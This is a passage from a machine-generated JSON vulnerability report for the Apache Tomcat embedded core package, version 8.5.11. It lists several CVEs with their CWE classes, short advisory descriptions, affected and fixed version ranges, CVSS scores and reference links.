List","url":"https://lists.apache.org/thread.html/rd50baccd1bbb96c2327d5a8caa25a49692b3d68d96915bd1cfbb9f8b%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd50baccd1bbb96c2327d5a8caa25a49692b3d68d96915bd1cfbb9f8b@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re5eecbe5bf967439bafeeaa85987b3a43f0e6efe06b6976ee768cde2%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re5eecbe5bf967439bafeeaa85987b3a43f0e6efe06b6976ee768cde2@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf26663f42e7f1a1d1cac732469fb5e92c89908a48b61ec546dbb79ca%40%3Cbugs.httpd.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf26663f42e7f1a1d1cac732469fb5e92c89908a48b61ec546dbb79ca@%3Cbugs.httpd.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf992c5adf376294af31378a70aa8a158388a41d7039668821be28df3%40%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf992c5adf376294af31378a70aa8a158388a41d7039668821be28df3@%3Ccommits.tomee.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00006.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/05/msg00026.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2XFLQB3O5QVP4ZBIPVIXBEZV7F2R7ZMS"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/K3IPNHCKFVUKSHDTM45UL4Q765EHHTFG"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L46WJIV6UV3FWA5O5YEY6XLA73RYD53B"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2XFLQB3O5QVP4ZBIPVIXBEZV7F2R7ZMS"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K3IPNHCKFVUKSHDTM45UL4Q765EHHTFG"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L46WJIV6UV3FWA5O5YEY6XLA73RYD53B"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-1938"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-1938"},{"summary":"Gentoo Advisory glsa-202003-43","url":"https://security.gentoo.org/glsa/202003-43"},{"summary":"NetApp Advisory ntap-20200226-0002","url":"https://security.netapp.com/advisory/ntap-20200226-0002"},{"summary":"Debian Advisory dsa-4673","url":"https://www.debian.org/security/2020/dsa-4673"},{"summary":"Debian Advisory dsa-4680","url":"https://www.debian.org/security/2020/dsa-4680"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.51"]}],"title":"CVE-2020-1938/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-46589"]}],"cve":"CVE-2023-46589","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2023-11-28T18:30:23","ids":[{"system_name":"CVE Record","text":"CVE-2023-46589"},{"system_name":"NetApp Advisory","text":"ntap-20231214-0009"}],"notes":[{"audience":"developers","category":"other","text":"Inconsistent Interpretation of HTTP Requests","title":"Additional CWE: 444"},{"category":"description","details":"Vulnerability Description","text":"Apache Tomcat Improper Input Validation vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Apache Tomcat Improper Input Validation vulnerability Improper Input Validation vulnerability in Apache Tomcat. Tomcat from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.1.15, from 9.0.0-M1 through 9.0.82, and from 8.5.0 through 8.5.95 did not correctly parse HTTP trailer headers. A trailer header that exceeded the header size limit could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy.  Users are recommended to upgrade to version 11.0.0-M11 onwards, 10.1.16 onwards, 9.0.83 onwards or 8.5.96 onwards, which fix the issue.  ## Related CVE(s) BIT-tomcat-2023-46589, CVE-2023-46589"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.96"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.96"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/11/28/2"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/0rqq6ktozqc42ro8hhxdmmdjm1k1tpxr"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2024/01/msg00001.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-46589"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-46589"},{"summary":"NetApp Advisory ntap-20231214-0009","url":"https://security.netapp.com/advisory/ntap-20231214-0009"},{"summary":"Openwall Mailing List","url":"https://www.openwall.com/lists/oss-security/2023/11/28/2"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.96"]}],"title":"CVE-2023-46589/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-42795"]}],"cve":"CVE-2023-42795","cwe":{"id":"459","name":"Incomplete Cleanup"},"discovery_date":"2023-10-10T18:31:35","ids":[{"system_name":"CVE Record","text":"CVE-2023-42795"},{"system_name":"Debian Advisory","text":"dsa-5521"},{"system_name":"Debian Advisory","text":"dsa-5522"},{"system_name":"NetApp Advisory","text":"ntap-20231103-0007"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Tomcat Incomplete Cleanup vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Apache Tomcat Incomplete Cleanup vulnerability Incomplete Cleanup vulnerability in Apache Tomcat.  When recycling various internal objects in Apache Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.80 and from 8.5.0 through 8.5.93, an error could cause Tomcat to skip some parts of the recycling process leading to information leaking from the current request/response to the next.  Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fixes the issue.  ## Related CVE(s) BIT-tomcat-2023-42795, CVE-2023-42795"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.94"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.94"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/10/9"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/065jfyo583490r9j2v73nhpyxdob56lw"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-42795"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-42795"},{"summary":"NetApp Advisory ntap-20231103-0007","url":"https://security.netapp.com/advisory/ntap-20231103-0007"},{"summary":"Debian Advisory dsa-5521","url":"https://www.debian.org/security/2023/dsa-5521"},{"summary":"Debian Advisory dsa-5522","url":"https://www.debian.org/security/2023/dsa-5522"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.94"]}],"title":"CVE-2023-42795/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-25122"]}],"cve":"CVE-2021-25122","cwe":{"id":"200","name":"Exposure of Sensitive Information to an Unauthorized Actor"},"discovery_date":"2021-06-16T17:45:29","ids":[{"system_name":"CVE Record","text":"CVE-2021-25122"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"Debian Advisory","text":"dsa-4891"},{"system_name":"Gentoo Advisory","text":"glsa-202208-34"},{"system_name":"NetApp Advisory","text":"ntap-20210409-0002"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Exposure of Sensitive Information to an Unauthorized Actor in Apache Tomcat"},{"category":"details","details":"Vulnerability Details","text":"# Exposure of Sensitive Information to an Unauthorized Actor in Apache Tomcat When responding to new h2c connection requests, Apache Tomcat versions 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41 and 8.5.0 to 8.5.61 could duplicate request headers and a limited amount of request body from one request to another meaning user A and user B could both see the results of user A's request.  ## Related CVE(s) BIT-tomcat-2021-25122, CVE-2021-25122"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.63"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.63"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/03/01/1"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7%40%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcd90bf36b1877e1310b87ecd14ed7bbb15da52b297efd9f0e7253a3b@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd0463f9a5cbc02a485404c4b990f0da452e5ac5c237808edba11c947@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf6d5d57b114678d8898005faef31e9fd6d7c981fcc4ccfc3bc272fc9@%3Cdev.tomcat.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/03/msg00018.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25122"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25122"},{"summary":"Gentoo Advisory glsa-202208-34","url":"https://security.gentoo.org/glsa/202208-34"},{"summary":"NetApp Advisory ntap-20210409-0002","url":"https://security.netapp.com/advisory/ntap-20210409-0002"},{"summary":"Debian Advisory dsa-4891","url":"https://www.debian.org/security/2021/dsa-4891"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.63"]}],"title":"CVE-2021-25122/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-25329"]}],"cve":"CVE-2021-25329","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-03-19T20:11:13","ids":[{"system_name":"CVE Record","text":"CVE-2021-25329"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"Debian Advisory","text":"dsa-4891"},{"system_name":"Gentoo Advisory","text":"glsa-202208-34"},{"system_name":"NetApp Advisory","text":"ntap-20210409-0002"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Potential remote code execution in Apache Tomcat"},{"category":"details","details":"Vulnerability Details","text":"# Potential remote code execution in Apache Tomcat The fix for CVE-2020-9484 was incomplete. When using Apache Tomcat 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41, 8.5.0 to 8.5.61 or 7.0.0. to 7.0.107 with a configuration edge case that was highly unlikely to be used, the Tomcat instance was still vulnerable to CVE-2020-9494. Note that both the previously published prerequisites for CVE-2020-9484 and the previously published mitigations for CVE-2020-9484 also apply to this issue.  ## Related CVE(s) BIT-tomcat-2021-25329, CVE-2021-25329"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.61"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.61"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/03/01/2"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r11ce01e8a4c7269b88f88212f21830edf73558997ac7744f37769b77@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r732b2ca289dc02df2de820e8775559abd6c207f159e39f559547a085@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8a2ac0e476dbfc1e6440b09dcc782d444ad635d6da26f0284725a5dc@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb51ccd58b2152fc75125b2406fc93e04ca9d34e737263faa6ff0f41f@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf6d5d57b114678d8898005faef31e9fd6d7c981fcc4ccfc3bc272fc9@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf%40%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cusers.tomcat.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/03/msg00018.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25329"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25329"},{"summary":"Gentoo Advisory glsa-202208-34","url":"https://security.gentoo.org/glsa/202208-34"},{"summary":"NetApp Advisory ntap-20210409-0002","url":"https://security.netapp.com/advisory/ntap-20210409-0002"},{"summary":"Debian Advisory dsa-4891","url":"https://www.debian.org/security/2021/dsa-4891"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":7.0,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.0,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":7.0,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.61"]}],"title":"CVE-2021-25329/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-42252"]}],"cve":"CVE-2022-42252","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2022-11-01T12:00:30","ids":[{"system_name":"CVE Record","text":"CVE-2022-42252"},{"system_name":"Gentoo Advisory","text":"glsa-202305-37"}],"notes":[{"audience":"developers","category":"other","text":"Inconsistent Interpretation of HTTP Requests","title":"Additional CWE: 444"},{"category":"description","details":"Vulnerability Description","text":"Apache Tomcat may reject request containing invalid Content-Length header"},{"category":"details","details":"Vulnerability Details","text":"# Apache Tomcat may reject request containing invalid Content-Length header If Apache Tomcat 8.5.0 to 8.5.82, 9.0.0-M1 to 9.0.67, 10.0.0-M1 to 10.0.26 or 10.1.0-M1 to 10.1.0 was configured to ignore invalid HTTP headers via setting rejectIllegalHeader to false (the default for 8.5.x only), Tomcat did not reject a request containing an invalid Content-Length header making a request smuggling attack possible if Tomcat was located behind a reverse proxy that also failed to reject the request with the invalid header.  ## Related CVE(s) BIT-tomcat-2022-42252, CVE-2022-42252"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.83"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.83"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/zzcxzvqfdqn515zfs3dxb7n8gty589sq"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42252"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42252"},{"summary":"Gentoo Advisory glsa-202305-37","url":"https://security.gentoo.org/glsa/202305-37"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.83"]}],"title":"CVE-2022-42252/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-41080"]}],"cve":"CVE-2023-41080","cwe":{"id":"601","name":"URL Redirection to Untrusted Site"},"discovery_date":"2023-08-25T21:30:48","ids":[{"system_name":"CVE Record","text":"CVE-2023-41080"},{"system_name":"Debian Advisory","text":"dsa-5521"},{"system_name":"Debian Advisory","text":"dsa-5522"},{"system_name":"NetApp Advisory","text":"ntap-20230921-0006"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Tomcat Open Redirect vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Apache Tomcat Open Redirect vulnerability URL Redirection to Untrusted Site ('Open Redirect') vulnerability in FORM authentication feature Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.0.12, from 9.0.0-M1 through 9.0.79 and from 8.5.0 through 8.5.92.  The vulnerability is limited to the ROOT (default) web application.  ## Related CVE(s) BIT-tomcat-2023-41080, CVE-2023-41080"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.93"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.93"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/71wvwprtx2j2m54fovq9zr7gbm2wow2f"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-41080"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-41080"},{"summary":"NetApp Advisory ntap-20230921-0006","url":"https://security.netapp.com/advisory/ntap-20230921-0006"},{"summary":"Debian Advisory dsa-5521","url":"https://www.debian.org/security/2023/dsa-5521"},{"summary":"Debian Advisory dsa-5522","url":"https://www.debian.org/security/2023/dsa-5522"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":6.1,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":6.1,"environmentalSeverity":"MEDIUM","integrityImpact":"LOW","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"LOW","modifiedPrivilegesRequired":"NONE","modifiedScope":"CHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"CHANGED","temporalScore":6.1,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.93"]}],"title":"CVE-2023-41080/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-1935"]}],"cve":"CVE-2020-1935","cwe":{"id":"444","name":"Inconsistent Interpretation of HTTP Requests"},"discovery_date":"2020-02-28T01:10:48","ids":[{"system_name":"CVE Record","text":"CVE-2020-1935"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Debian Advisory","text":"dsa-4673"},{"system_name":"Debian Advisory","text":"dsa-4680"},{"system_name":"NetApp Advisory","text":"ntap-20200327-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Potential HTTP request smuggling in Apache Tomcat"},{"category":"details","details":"Vulnerability Details","text":"# Potential HTTP request smuggling in Apache Tomcat In Apache Tomcat 9.0.0.M1 to 9.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99 the HTTP header parsing code used an approach to end-of-line parsing that allowed some invalid HTTP headers to be parsed as valid. This led to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely.  ## Related CVE(s) BIT-tomcat-2020-1935, CVE-2020-1935"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.51"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.51"]},"references":[{"summary":"Open Suse Mailing List","url":"http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r127f76181aceffea2bd4711b03c595d0f115f63e020348fe925a916c%40%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r441c1f30a252bf14b07396286f6abd8089ce4240e91323211f1a2d75@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r660cd379afe346f10d72c0eaa8459ccc95d83aff181671b7e9076919@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7bc994c965a34876bd94d5ff15b4e1e30b6220a15eb9b47c81915b78@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r80e9c8417c77d52c62809168b96912bda70ddf7748f19f8210f745b1@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9ce7918faf347e7aac32be930bf26c233b0b140fe37af0bb294158b6@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing 